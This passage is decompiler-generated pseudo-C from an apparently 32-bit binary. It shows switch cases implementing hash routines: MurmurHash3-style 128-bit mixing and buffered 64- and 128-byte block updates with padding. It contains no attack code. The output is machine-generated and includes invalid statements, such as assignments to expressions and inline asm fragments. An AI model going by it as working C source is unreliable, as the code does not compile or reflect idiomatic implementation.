											__edx = __eax * 0x114253d5 >> 0x20;
											__eax = __eax * 0x114253d5;
											__edi = 5;
											__edx = __esi + __edx;
											__esi = __esp[5];
											__eax = __eax ^ __esp[4];
											__ebp = __eax;
											__edx = __edx ^ __esp[5];
											__eax = (__eax << 0x00000020 | __edx) << 0x1f;
											__edx = (__edx << 0x00000020 | __ebp) << 0x1f;
											__eax = __eax +  *__esp;
											asm("adc edx, [esp+0x4]");
											__ebp = __edx + __edx * 4;
											__edx = __eax * 5 >> 0x20;
											__eax = __eax * 5;
											__edx = __edx + __ebp;
											__esp[4] = __eax;
											asm("adc edx, 0x0");
											__esp[5] = __edx;
											goto L188;
										} else {
											__edi = __eax + 1;
											__ebp = __esp[0x12];
											 *(__ecx + 0x20) = __edi;
											__edx =  *__ebx & 0x000000ff;
											__ebp = __esp[0x12] - 1;
											 *(__ecx + __eax + 0x10) = __dl;
											if(__ebp == 0) {
												goto L193;
											} else {
												if(__edi == 0x10) {
													__esp[0x12] = __ebp;
													__ebx = __ebx + 1;
													goto L187;
												} else {
													__ebp = __eax + 2;
													 *(__ecx + 0x20) = __ebp;
													__edx =  *(__ebx + 1) & 0x000000ff;
													 *(__ecx + __edi + 0x10) = __dl;
													__edx = __esp[0x12];
													__edx = __esp[0x12] - 2;
													if(__edx == 0) {
														goto L193;
													} else {
														if(__ebp == 0x10) {
															__esp[0x12] = __edx;
															__ebx = __ebx + 2;
															goto L187;
														} else {
															__edi = __eax + 3;
															 *(__ecx + 0x20) = __edi;
															__edx =  *(__ebx + 2) & 0x000000ff;
															 *(__ecx + 0x10 + __ebp) = __dl;
															__ebp = __esp[0x12];
															__ebp = __esp[0x12] - 3;
															if(__ebp == 0) {
																goto L193;
															} else {
																if(__edi == 0x10) {
																	__esp[0x12] = __ebp;
																	__ebx = __ebx + 3;
																	goto L187;
																} else {
																	__ebp = __eax + 4;
																	 *(__ecx + 0x20) = __ebp;
																	__edx =  *(__ebx + 3) & 0x000000ff;
																	 *(__ecx + __edi + 0x10) = __dl;
																	__edx = __esp[0x12];
																	__edx = __esp[0x12] - 4;
																	if(__edx == 0) {
																		goto L193;
																	} else {
																		if(__ebp == 0x10) {
																			__esp[0x12] = __edx;
																			__ebx = __ebx + 4;
																			goto L187;
																		} else {
																			__edi = __eax + 5;
																			 *(__ecx + 0x20) = __edi;
																			__edx =  *(__ebx + 4) & 0x000000ff;
																			 *(__ecx + 0x10 + __ebp) = __dl;
																			__ebp = __esp[0x12];
																			__ebp = __esp[0x12] - 5;
																			if(__ebp == 0) {
																				goto L193;
																			} else {
																				if(__edi == 0x10) {
																					__esp[0x12] = __ebp;
																					__ebx = 5 + __ebx;
																					goto L187;
																				} else {
																					__ebp = __eax + 6;
																					 *(__ecx + 0x20) = __ebp;
																					__edx =  *(5 + __ebx) & 0x000000ff;
																					 *(__ecx + __edi + 0x10) = __dl;
																					__edx = __esp[0x12];
																					__edx = __esp[0x12] - 6;
																					if(__edx == 0) {
																						goto L193;
																					} else {
																						if(__ebp == 0x10) {
																							__esp[0x12] = __edx;
																							__ebx = __ebx + 6;
																							goto L187;
																						} else {
																							__edi = __eax + 7;
																							 *(__ecx + 0x20) = __edi;
																							__edx =  *(__ebx + 6) & 0x000000ff;
																							 *(__ecx + 0x10 + __ebp) = __dl;
																							__ebp = __esp[0x12];
																							__ebp = __esp[0x12] - 7;
																							if(__ebp == 0) {
																								goto L193;
																							} else {
																								if(__edi == 0x10) {
																									__esp[0x12] = __ebp;
																									__ebx = __ebx + 7;
																									goto L187;
																								} else {
																									__ebp = __eax + 8;
																									 *(__ecx + 0x20) = __ebp;
																									__edx =  *(__ebx + 7) & 0x000000ff;
																									 *(__ecx + __edi + 0x10) = __dl;
																									__edx = __esp[0x12];
																									__edx = __esp[0x12] - 8;
																									if(__edx == 0) {
																										goto L193;
																									} else {
																										if(__ebp == 0x10) {
																											__esp[0x12] = __edx;
																											__ebx = 8 + __ebx;
																											goto L187;
																										} else {
																											__edi = __eax + 9;
																											 *(__ecx + 0x20) = __edi;
																											__edx =  *(8 + __ebx) & 0x000000ff;
																											 *(__ecx + 0x10 + __ebp) = __dl;
																											__ebp = __esp[0x12];
																											__ebp = __esp[0x12] - 9;
																											if(__ebp == 0) {
																												goto L193;
																											} else {
																												if(__edi == 0x10) {
																													__esp[0x12] = __ebp;
																													__ebx = __ebx + 9;
																													goto L187;
																												} else {
																													__ebp = __eax + 0xa;
																													 *(__ecx + 0x20) = __ebp;
																													__edx =  *(__ebx + 9) & 0x000000ff;
																													 *(__ecx + __edi + 0x10) = __dl;
																													__edx = __esp[0x12];
																													__edx = __esp[0x12] - 0xa;
																													if(__edx == 0) {
																														goto L193;
																													} else {
																														if(__ebp == 0x10) {
																															__esp[0x12] = __edx;
																															__ebx = __ebx + 0xa;
																															goto L187;
																														} else {
																															__edi = __eax + 0xb;
																															 *(__ecx + 0x20) = __edi;
																															__edx =  *(__ebx + 0xa) & 0x000000ff;
																															 *(__ecx + 0x10 + __ebp) = __dl;
																															__ebp = __esp[0x12];
																															__ebp = __esp[0x12] - 0xb;
																															if(__ebp == 0) {
																																goto L193;
																															} else {
																																if(__edi == 0x10) {
																																	__esp[0x12] = __ebp;
																																	__ebx = __ebx + 0xb;
																																	goto L187;
																																} else {
																																	__ebp = __eax + 0xc;
																																	 *(__ecx + 0x20) = __ebp;
																																	__edx =  *(__ebx + 0xb) & 0x000000ff;
																																	 *(__ecx + __edi + 0x10) = __dl;
																																	__edx = __esp[0x12];
																																	__edx = __esp[0x12] - 0xc;
																																	if(__edx == 0) {
																																		goto L193;
																																	} else {
																																		if(__ebp == 0x10) {
																																			__esp[0x12] = __edx;
																																			__ebx = __ebx + 0xc;
																																			goto L187;
																																		} else {
																																			__edi = __eax + 0xd;
																																			 *(__ecx + 0x20) = __edi;
																																			__edx =  *(__ebx + 0xc) & 0x000000ff;
																																			 *(__ecx + 0x10 + __ebp) = __dl;
																																			__ebp = __esp[0x12];
																																			__ebp = __esp[0x12] - 0xd;
																																			if(__ebp == 0) {
																																				goto L193;
																																			} else {
																																				if(__edi == 0x10) {
																																					__esp[0x12] = __ebp;
																																					__ebx = __ebx + 0xd;
																																					goto L187;
																																				} else {
																																					__eax = __eax + 0xe;
																																					 *(__ecx + 0x20) = __eax;
																																					__edx =  *(__ebx + 0xd) & 0x000000ff;
																																					 *(__ecx + __edi + 0x10) = __dl;
																																					__edx = __esp[0x12];
																																					__edx = __esp[0x12] - 0xe;
																																					if(__edx == 0) {
																																						goto L193;
																																					} else {
																																						if(__eax != 0xf) {
																																							__esp[0x12] = __edx;
																																							__ebx = __ebx + 0xe;
																																							goto L187;
																																						} else {
																																							 *(__ecx + 0x20) = 0x10;
																																							__edx = __ebx + 0xf;
																																							__eax =  *(__ebx + 0xe) & 0x000000ff;
																																							_t394 =  &(__esp[0x12]);
																																							 *_t394 = __esp[0x12] - 0xf;
																																							 *(__ecx + 0x1f) = __al;
																																							if( *_t394 == 0) {
																																								goto L193;
																																							} else {
																																								__ebx = __edx;
																																								goto L187;
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								goto L457;
							case 0x17:
								__esp[0xa] = __ecx;
								__esp[9] = __edx;
								__eax =  *__ebx;
								__ebx = __esp[6];
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								_push(__ebp);
								__edx = 0;
								_push(__edi);
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x2c;
								__esi = __esp[0x10];
								__ebx = __esp[0x12];
								__edi =  *(__esi + 8);
								__eax = __ebx;
								__edi =  *(__esi + 8) & 0x0000003f;
								__eax = __ebx +  *(__esi + 8);
								asm("adc edx, [esi+0xc]");
								 *(__esi + 8) = __ebx +  *(__esi + 8);
								__eax = 0x40;
								__eax = 0x40 - __edi;
								 *(__esi + 0xc) = 0;
								__edx = __edi + 0x10;
								if(__ebx >= 0x40) {
									__ecx = __esp[0x11];
									__ebp = __esi + __edx;
									__esp[5] = 0x40;
									if(0x40 >= 4) {
										if((__ebp & 0x00000001) != 0) {
											__ecx =  *__ecx & 0x000000ff;
											_t791 = __eax - 1; // 0x3f
											__edx = _t791;
											__ebp = __ebp + 1;
											 *(__ebp - 1) = __cl;
											__esp[5] = _t791;
											__ecx = __esp[0x11];
											__ecx = __esp[0x11] + 1;
										}
										if((__ebp & 0x00000002) != 0) {
											__edx =  *__ecx & 0x0000ffff;
											__ebp = __ebp + 2;
											__ecx = __ecx + 2;
											 *(__ebp - 2) = __dx;
											__esp[5] = __esp[5] - 2;
										}
										__edx = __esp[5];
										if(__edx >= 4) {
											__esp[7] = __eax;
											__esp[6] = __edx;
											__edx = 0;
											__esp[0x12] = __ebx;
											__eax = __esp[6];
											do {
												__ebx =  *(__ecx + __edx);
												 *(__ebp + __edx) =  *(__ecx + __edx);
												__edx = __edx + 4;
											} while (__edx < __eax);
											__eax = __esp[7];
											__ebp = __ebp + __edx;
											__ecx = __ecx + __edx;
											__ebx = __esp[0x12];
										}
									}
									__edx = 0;
									if((__esp[5] & 0x00000002) != 0) {
										__edx =  *__ecx & 0x0000ffff;
										 *__ebp = __dx;
										__edx = 2;
										if((__esp[5] & 0x00000001) != 0) {
											goto L258;
										}
									} else {
										if((__esp[5] & 0x00000001) != 0) {
											L258:
											__ecx =  *(__ecx + __edx) & 0x000000ff;
											 *(__ebp + __edx) = __cl;
										}
									}
									__esp[5] = __eax;
									__edx = __esi + 0x10;
									__esp[1] = __esi + 0x10;
									__ebp = __esi + 0x50;
									 *__esp = __ebp;
									__ebx = __edi + __ebx - 0x40;
									 *((intOrPtr*)(__esi + 0x78))() = __esp[5];
									__edx = __ebx;
									__esp[0x11] = __esp[0x11] + __esp[5];
									__edx = __ebx & 0xffffffc0;
									__ebx = __ebx & 0x0000003f;
									__eax = __esp[0x11];
									__eax = __esp[0x11] + __edx;
									if(__esp[0x11] >= __eax) {
										__edx = 0x10;
									} else {
										__esp[0x12] = __ebx;
										__edi = __esp[0x11];
										__esp[5] = __edx;
										__ebx = __esp[0x11];
										__edi = __eax;
										do {
											__esp[1] = __ebx;
											__ebx = 0x40 + __ebx;
											 *__esp = __ebp;
											__eax =  *((intOrPtr*)(__esi + 0x78))();
										} while (__ebx < __edi);
										__edx = __esp[5];
										__esp[0x11] = __esp[0x11] + __esp[5];
										__edx = 0x10;
										__ebx = __esp[0x12];
									}
								}
								__eax = __esp[0x11];
								__ecx = __esi + __edx;
								if(__ebx >= 4) {
									if((__cl & 0x00000001) != 0) {
										__edx =  *__eax & 0x000000ff;
										__ecx = __ecx + 1;
										__eax = __eax + 1;
										__ebx = __ebx - 1;
										 *(__ecx - 1) = __dl;
									}
									if((__cl & 0x00000002) != 0) {
										__edi =  *__eax & 0x0000ffff;
										__ecx = __ecx + 2;
										__eax = __eax + 2;
										__ebx = __ebx - 2;
										 *(__ecx - 2) = __di;
									}
									if(__ebx >= 4) {
										__edi = __ebx;
										__edx = 0;
										__edi = __ebx & 0xfffffffc;
										do {
											__esi =  *(__eax + __edx);
											 *(__ecx + __edx) =  *(__eax + __edx);
											__edx = __edx + 4;
										} while (__edx < __edi);
										__ecx = __ecx + __edx;
										__eax = __eax + __edx;
									}
								}
								__edx = 0;
								if((__bl & 0x00000002) != 0) {
									__esi =  *__eax & 0x0000ffff;
									__edx = 2;
									 *__ecx = __si;
									if((__bl & 0x00000001) == 0) {
										goto L241;
									} else {
										goto L242;
									}
								} else {
									if((__bl & 0x00000001) != 0) {
										L242:
										__eax =  *(__eax + __edx) & 0x000000ff;
										 *(__ecx + __edx) = __al;
										__esp =  &(__esp[0xb]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									} else {
										L241:
										__esp =  &(__esp[0xb]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									}
								}
								goto L457;
							case 0x18:
								__esp[0xa] = __ecx;
								__esp[9] = __edx;
								__eax =  *__ebx;
								__ebx = __esp[6];
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								_push(__ebp);
								__edx = 0;
								_push(__edi);
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x2c;
								__esi = __esp[0x10];
								__ebx = __esp[0x12];
								__edi =  *(__esi + 8);
								__eax = __ebx;
								__edi =  *(__esi + 8) & 0x0000003f;
								__eax = __ebx +  *(__esi + 8);
								asm("adc edx, [esi+0xc]");
								 *(__esi + 8) = __ebx +  *(__esi + 8);
								__eax = 0x40;
								__eax = 0x40 - __edi;
								 *(__esi + 0xc) = 0;
								__edx = __edi + 0x10;
								if(__ebx >= 0x40) {
									__ecx = __esp[0x11];
									__ebp = __esi + __edx;
									__esp[5] = 0x40;
									if(0x40 >= 4) {
										if((__ebp & 0x00000001) != 0) {
											__ecx =  *__ecx & 0x000000ff;
											_t918 = __eax - 1; // 0x3f
											__edx = _t918;
											__ebp = __ebp + 1;
											 *(__ebp - 1) = __cl;
											__esp[5] = _t918;
											__ecx = __esp[0x11];
											__ecx = __esp[0x11] + 1;
										}
										if((__ebp & 0x00000002) != 0) {
											__edx =  *__ecx & 0x0000ffff;
											__ebp = __ebp + 2;
											__ecx = __ecx + 2;
											 *(__ebp - 2) = __dx;
											__esp[5] = __esp[5] - 2;
										}
										__edx = __esp[5];
										if(__edx >= 4) {
											__esp[7] = __eax;
											__esp[6] = __edx;
											__edx = 0;
											__esp[0x12] = __ebx;
											__eax = __esp[6];
											do {
												__ebx =  *(__ecx + __edx);
												 *(__ebp + __edx) =  *(__ecx + __edx);
												__edx = __edx + 4;
											} while (__edx < __eax);
											__eax = __esp[7];
											__ebp = __ebp + __edx;
											__ecx = __ecx + __edx;
											__ebx = __esp[0x12];
										}
									}
									__edx = 0;
									if((__esp[5] & 0x00000002) != 0) {
										__edx =  *__ecx & 0x0000ffff;
										 *__ebp = __dx;
										__edx = 2;
										if((__esp[5] & 0x00000001) != 0) {
											goto L311;
										}
									} else {
										if((__esp[5] & 0x00000001) != 0) {
											L311:
											__ecx =  *(__ecx + __edx) & 0x000000ff;
											 *(__ebp + __edx) = __cl;
										}
									}
									__esp[5] = __eax;
									__edx = __esi + 0x10;
									__esp[1] = __esi + 0x10;
									__ebp = __esi + 0x50;
									 *__esp = __ebp;
									__ebx = __edi + __ebx - 0x40;
									 *(__esi + 0x70)() = __esp[5];
									__edx = __ebx;
									__esp[0x11] = __esp[0x11] + __esp[5];
									__edx = __ebx & 0xffffffc0;
									__ebx = __ebx & 0x0000003f;
									__eax = __esp[0x11];
									__eax = __esp[0x11] + __edx;
									if(__esp[0x11] >= __eax) {
										__edx = 0x10;
									} else {
										__esp[0x12] = __ebx;
										__edi = __esp[0x11];
										__esp[5] = __edx;
										__ebx = __esp[0x11];
										__edi = __eax;
										do {
											__esp[1] = __ebx;
											__ebx = 0x40 + __ebx;
											 *__esp = __ebp;
											__eax =  *(__esi + 0x70)();
										} while (__ebx < __edi);
										__edx = __esp[5];
										__esp[0x11] = __esp[0x11] + __esp[5];
										__edx = 0x10;
										__ebx = __esp[0x12];
									}
								}
								__eax = __esp[0x11];
								__ecx = __esi + __edx;
								if(__ebx >= 4) {
									if((__cl & 0x00000001) != 0) {
										__edx =  *__eax & 0x000000ff;
										__ecx = __ecx + 1;
										__eax = __eax + 1;
										__ebx = __ebx - 1;
										 *(__ecx - 1) = __dl;
									}
									if((__cl & 0x00000002) != 0) {
										__edi =  *__eax & 0x0000ffff;
										__ecx = __ecx + 2;
										__eax = __eax + 2;
										__ebx = __ebx - 2;
										 *(__ecx - 2) = __di;
									}
									if(__ebx >= 4) {
										__edi = __ebx;
										__edx = 0;
										__edi = __ebx & 0xfffffffc;
										do {
											__esi =  *(__eax + __edx);
											 *(__ecx + __edx) =  *(__eax + __edx);
											__edx = __edx + 4;
										} while (__edx < __edi);
										__ecx = __ecx + __edx;
										__eax = __eax + __edx;
									}
								}
								__edx = 0;
								if((__bl & 0x00000002) != 0) {
									__esi =  *__eax & 0x0000ffff;
									__edx = 2;
									 *__ecx = __si;
									if((__bl & 0x00000001) == 0) {
										goto L294;
									} else {
										goto L295;
									}
								} else {
									if((__bl & 0x00000001) != 0) {
										L295:
										__eax =  *(__eax + __edx) & 0x000000ff;
										 *(__ecx + __edx) = __al;
										__esp =  &(__esp[0xb]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									} else {
										L294:
										__esp =  &(__esp[0xb]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									}
								}
								goto L457;
							case 0x19:
								__esp[0xa] = __ecx;
								__esp[9] = __edx;
								__eax =  *__ebx;
								__ebx = __esp[6];
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								_push(__ebp);
								__edx = 0;
								_push(__edi);
								_push(__esi);
								__esi = 0x80;
								_push(__ebx);
								__esp = __esp - 0x14;
								__edi = __esp[0xa];
								__ebx = __esp[0xc];
								__ecx =  *(__edi + 8);
								__eax = __ebx;
								__ecx =  *(__edi + 8) & 0x0000007f;
								__eax = __ebx +  *(__edi + 8);
								asm("adc edx, [edi+0xc]");
								__esi = 0x80 - __ecx;
								 *(__edi + 8) = __ebx +  *(__edi + 8);
								__eax = 0x10 + __ecx;
								 *(__edi + 0xc) = 0;
								if(__ebx >= 0x80) {
									__edx = __esp[0xb];
									__ebp = __edi + __eax;
									 *__esp = 0x80;
									if(0x80 >= 4) {
										if((__ebp & 0x00000001) != 0) {
											__eax =  *__edx & 0x000000ff;
											__ebp = __ebp + 1;
											 *(__ebp - 1) = __al;
											__eax = __esp[0xb];
											__edx = __esp[0xb] + 1;
											__eax = 0x7f;
											 *__esp = 0x7f;
										}
										if((__ebp & 0x00000002) != 0) {
											__eax =  *__edx & 0x0000ffff;
											__ebp = __ebp + 2;
											__edx = __edx + 2;
											 *(__ebp - 2) = __ax;
											 *__esp =  *__esp - 2;
										}
										__eax =  *__esp;
										if(__eax >= 4) {
											__esp[2] = __esi;
											__esp[1] = __eax;
											__eax = 0;
											__esp[3] = __ecx;
											__esi = __esp[1];
											do {
												__ecx =  *(__eax + __edx);
												 *(__eax + __ebp) =  *(__eax + __edx);
												__eax = __eax + 4;
											} while (__eax < __esi);
											__esi = __esp[2];
											__ebp = __eax + __ebp;
											__edx = __eax + __edx;
											__ecx = __esp[3];
										}
									}
									__eax = 0;
									if(( *__esp & 0x00000002) != 0) {
										__eax =  *__edx & 0x0000ffff;
										 *__ebp = __ax;
										__eax = 2;
										if(( *__esp & 0x00000001) != 0) {
											goto L363;
										}
									} else {
										if(( *__esp & 0x00000001) != 0) {
											L363:
											__edx =  *(__eax + __edx) & 0x000000ff;
											 *(__eax + __ebp) = __dl;
										}
									}
									 *__esp = __ecx;
									__ebp = __edi + 0x90;
									__edx = __edi + 0x10;
									__ebp = E10041550(__ebp, __edi + 0x10);
									__ecx =  *__esp;
									__esp[0xb] = __esp[0xb] + __esi;
									__eax = __esp[0xb];
									__ebx =  *__esp + __ebx - 0x80;
									__edx = __ebx;
									__ebx = __ebx & 0x0000007f;
									__edx = __edx & 0xffffff80;
									__eax = __esp[0xb] + __edx;
									if(__esp[0xb] >= __eax) {
										__eax = 0x10;
									} else {
										__esp[0xc] = __ebx;
										__esi = __esp[0xb];
										 *__esp = __edx;
										__ebx = __esp[0xb];
										__esi = __eax;
										do {
											__edx = __ebx;
											__ebp = E10041550(__ebp, __ebx);
											__ebx = __ebx - 0xffffff80;
										} while (__ebx < __esi);
										__edx =  *__esp;
										__eax = 0x10;
										__ebx = __esp[0xc];
										__esp[0xb] = __esp[0xb] +  *__esp;
									}
								}
								__ecx = __edi + __eax;
								__eax = __esp[0xb];
								if(__ebx >= 4) {
									if((__cl & 0x00000001) != 0) {
										__edx =  *__eax & 0x000000ff;
										__ecx = __ecx + 1;
										__eax = __eax + 1;
										__ebx = __ebx - 1;
										 *(__ecx - 1) = __dl;
									}
									if((__cl & 0x00000002) != 0) {
										__esi =  *__eax & 0x0000ffff;
										__ecx = __ecx + 2;
										__eax = __eax + 2;
										__ebx = __ebx - 2;
										 *(__ecx - 2) = __si;
									}
									if(__ebx >= 4) {
										__edi = __ebx;
										__edx = 0;
										__edi = __ebx & 0xfffffffc;
										do {
											__esi =  *(__eax + __edx);
											 *(__ecx + __edx) =  *(__eax + __edx);
											__edx = __edx + 4;
										} while (__edx < __edi);
										__ecx = __ecx + __edx;
										__eax = __eax + __edx;
									}
								}
								__edx = 0;
								if((__bl & 0x00000002) != 0) {
									__edi =  *__eax & 0x0000ffff;
									__edx = 2;
									 *__ecx = __di;
									if((__bl & 0x00000001) == 0) {
										goto L346;
									} else {
										goto L347;
									}
								} else {
									if((__bl & 0x00000001) != 0) {
										L347:
										__eax =  *(__eax + __edx) & 0x000000ff;
										 *(__ecx + __edx) = __al;
										__esp =  &(__esp[5]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									} else {
										L346:
										__esp =  &(__esp[5]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									}
								}
								goto L457;
							case 0x1a:
								__esp[3] = __ecx;
								__esp[2] = __edx;
								__eax =  *(__ebx + 0xc);
								__esp[1] =  *(__ebx + 0xc);
								__eax =  *(8 + __ebx);
								 *__esp =  *(8 + __ebx);
								__eax = E100101D0();
								 *(__ebx + 0xc) = __eax;
								__ebx = __esp[6];
								__esp =  &(__esp[7]);
								return __eax;
								goto L457;
							case 0x1b:
								__esp[2] = __ecx;
								__esp[1] = __edx;
								__eax =  *(__ebx + 0xc);
								 *__esp =  *(__ebx + 0xc);
								__eax = E10001410();
								 *(__ebx + 0xc) = __eax;
								__ebx = __esp[6];
								__esp =  &(__esp[7]);
								return __eax;
								goto L457;
							case 0x1c:
								__esp[2] = __ecx;
								__esp[1] = __eax;
								_push(__ebp);
								_push(__edi);
								__edi = 0x100b7204;
								_push(__esi);
								__esi = 1;
								_push(__ebx);
								__esp = __esp - 0x2c;
								__ebx = __esp[0x10];
								__eax =  *__ebx;
								__edx =  *(__ebx + 4);
								__esp[2] = 1;
								__esp[1] = 0x100b7204;
								 *__esp = __ebx;
								__edx = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
								__esp[9] = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
								__esp[8] = __eax;
								L98();
								__esi =  *__ebx;
								__edi =  *(__ebx + 4);
								__esi = __esi & 0x0000003f;
								if((__esi & 0x0000003f ^ 0x00000038) != 0) {
									__ebp = __ebx + 0x48;
									__esp[5] = __ebx + 0x48;
									__ecx = 8 + __ebx;
									__ebp = 8 + __ebx;
									while(1) {
										L134:
										__eax = __esi;
										__eax = __esi & 0x0000003f;
										__esi = __esi + 1;
										 *__ebx = __esi;
										asm("adc edi, 0x0");
										 *(__ebx + 4) = __edi;
										if(__eax != 0) {
											break;
										}
										__eax = __esp[5];
										__ecx = 0;
										__edx = 0x100b7206;
										E10028070(__esp[5], 0, 0x100b7206) = __esi;
										 *(8 + __ebx) = 0;
										__esi & 0x0000003f = __esi & 0x0000003f ^ 0x00000038;
										__eax = __esi & 0x0000003f ^ 0x00000038;
										if((__esi & 0x0000003f ^ 0x00000038) != 0) {
											continue;
										}
										goto L138;
									}
									 *(__eax + __ebp) = 0;
									if(__eax == 0x3f) {
										__edi = __esp[5];
										__ecx = 1;
										__edx = __ebp;
										__edi = E10028070(__edi, 1, __ebp);
										__ecx = 0;
										__edx = 0x100b7207;
										__edi = E10028070(__edi, 0, 0x100b7207);
									}
									__esi =  *__ebx;
									__edi =  *(__ebx + 4);
									__esi = __esi & 0x0000003f;
									if((__esi & 0x0000003f ^ 0x00000038) != 0) {
										goto L134;
									}
								}
								L138:
								 *__esp = __ebx;
								__eax = 8;
								__esp[2] = 8;
								__eax =  &(__esp[8]);
								__esp[1] =  &(__esp[8]);
								L98();
								__eax =  *(__ebx + 0x54);
								__edi = __esp[0x11];
								 *__edi =  *(__ebx + 0x54);
								__eax =  *(__ebx + 0x50);
								 *(__edi + 4) =  *(__ebx + 0x50);
								__eax =  *(__ebx + 0x4c);
								 *(__edi + 8) =  *(__ebx + 0x4c);
								__eax =  *(__ebx + 0x48);
								 *(__edi + 0xc) = __eax;
								__esp =  &(__esp[0xb]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __eax;
								goto L457;
							case 0x1d:
								__esp[2] = __ecx;
								__esp[1] = __eax;
								_push(__ebp);
								_push(__edi);
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x1c;
								__eax = __esp[0xc];
								__edi = __esp[0xc];
								__edx =  *(__eax + 4);
								__eax =  *__eax;
								__esp[3] = __edx;
								__esp[2] = __eax;
								__eax = __esp[0xc];
								__edx =  *(__eax + 0xc);
								__eax =  *(__eax + 8);
								__esp[5] = __edx;
								__edx = 0x10;
								__esp[4] = __eax;
								__eax = __esp[0xc];
								__eax =  *(__esp[0xc] + 0x20);
								__edi = __esp[0xc] + __eax + 0x10;
								__edx = 0x10 - __eax;
								if(0x10 >= 8) {
									if((__edi & 0x00000001) != 0) {
										 *__edi = 0;
										__edx = __edx - 1;
										__edi = __edi + 1;
									}
									if((__edi & 0x00000002) != 0) {
										 *__edi = 0;
										__edx = __edx - 2;
										__edi = __edi + 2;
									}
									if((__edi & 0x00000004) != 0) {
										 *__edi = 0;
										__edx = __edx - 4;
										__edi = __edi + 4;
									}
									__ecx = __edx;
									__eax = 0;
									__ecx = __edx >> 2;
									__edx = __edx & 0x00000003;
									__eax = memset(__edi, 0, __ecx << 2);
									__edi = __edi + __ecx;
									__ecx = 0;
								}
								if((__dl & 0x00000004) != 0) {
									 *__edi = 0;
									__edi = __edi + 4;
								}
								if((__dl & 0x00000002) != 0) {
									 *__edi = 0;
									__edi = __edi + 2;
								}
								if((__dl & 0x00000001) != 0) {
									 *__edi = 0;
								}
								__eax = __esp[0xc];
								__ebx = __esp[0xc];
								__edi = __esp[3];
								__eax =  *(0x10 + __esp[0xc]);
								__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5;
								__ebx = 0x114253d5;
								__edx = __eax * 0x87c37b91;
								__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
								__edx = __eax * 0x114253d5 >> 0x20;
								__eax = __eax * 0x114253d5;
								__edx = __edx + __ecx;
								__ecx = __eax;
								__eax = (__eax << 0x00000020 | __edx) << 0x1f;
								__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
								__ebx = __eax;
								__eax = __esp[0xc];
								__esi = __edx;
								__ecx = __esp[2];
								__edx =  *(__eax + 0x2c);
								__eax =  *(__eax + 0x28);
								__esp[1] = __edx;
								__edx = __edx ^ __esp[3];
								 *__esp = __eax;
								__ebp = __edx;
								__eax = __eax ^ __esp[2];
								__edx = __ebx * 0x4cf5ad43;
								__edi = __eax;
								__ecx = __esi * 0x2745937f;
								__esi = 0x114253d5;
								__eax = __ecx + __ebx * 0x4cf5ad43;
								__ecx = 0x2745937f;
								__esp[2] = __eax;
								__eax = __ebx;
								__edx = __eax * 0x2745937f >> 0x20;
								__eax = __eax * 0x2745937f;
								__ebx = __esp[2];
								__eax = __eax ^ __edi;
								__edx = __esp[2] + __edx;
								__ebx = __esp[0xc];
								__esp[2] = __eax;
								__eax = __esp[0xc];
								__esp[3] = __edx;
								__edi =  *__esp;
								__ebp = __esp[1];
								__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f;
								__eax =  *(__esp[0xc] + 0x18);
								__ebx = __esp[5];
								__edx = __eax * 0x4cf5ad43;
								__ebp = __esp[1] ^ __esp[5];
								__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
								__edx = 0x2745937f;
								__edx = __eax * 0x2745937f >> 0x20;
								__eax = __eax * 0x2745937f;
								__edx = __edx + __ecx;
								__ecx = __eax;
								 *__esp = __eax;
								__edx = (__ecx << 0x00000020 | __edx) >> 0x1f;
								__ecx = __esp[4];
								__eax =  *__esp;
								__edi =  *__esp ^ __esp[4];
								__ecx =  *__esp ^ __esp[4];
								__edi = __edx * 0x114253d5;
								__edx =  *__esp * 0x87c37b91;
								__edi = __edi +  *__esp * 0x87c37b91;
								__edx = __eax * 0x114253d5 >> 0x20;
								__eax = __eax * 0x114253d5;
								__esi = __esp[2];
								__edx = __edi + __edx;
								__edi = __esp[3];
								__eax = __eax ^  *__esp ^ __esp[4];
								__edx = __edx ^ __esp[1] ^ __esp[5];
								__esi = __esp[2] + __eax;
								__ebp = 0x1a85ec53;
								asm("adc edi, edx");
								__eax = __eax + __esi;
								asm("adc edx, edi");
								__ecx = __eax;
								__eax = __edi;
								__ebx = __edx;
								__eax = __edi >> 1;
								__edx = 0;
								__eax = __edi >> 0x00000001 ^ __esi;
								__edx = 0 ^ __edi;
								__esi = (0 ^ __edi) * 0xed558ccd;
								__edi = __eax;
								__edx = __eax * 0xff51afd7;
								__eax = 0xed558ccd;
								__esi = __esi + __edx;
								__edx = 0xed558ccd * __edi >> 0x20;
								__eax = 0xed558ccd * __edi;
								__edi = 0;
								__edx = __esi + __edx;
								__esi = __edx;
								__edx = __edx ^ 0;
								 *__esp = __eax;
								__esi = __edx * 0x1a85ec53;
								__eax =  *__esp;
								__edx =  *__esp * 0xc4ceb9fe;
								__edi = __esi + __edx;
								__esp[2] = __esi + __edx;
								__edx = __eax * 0x1a85ec53 >> 0x20;
								__eax = __eax * 0x1a85ec53;
								__edi = __edx;
								__edx = __esp[2];
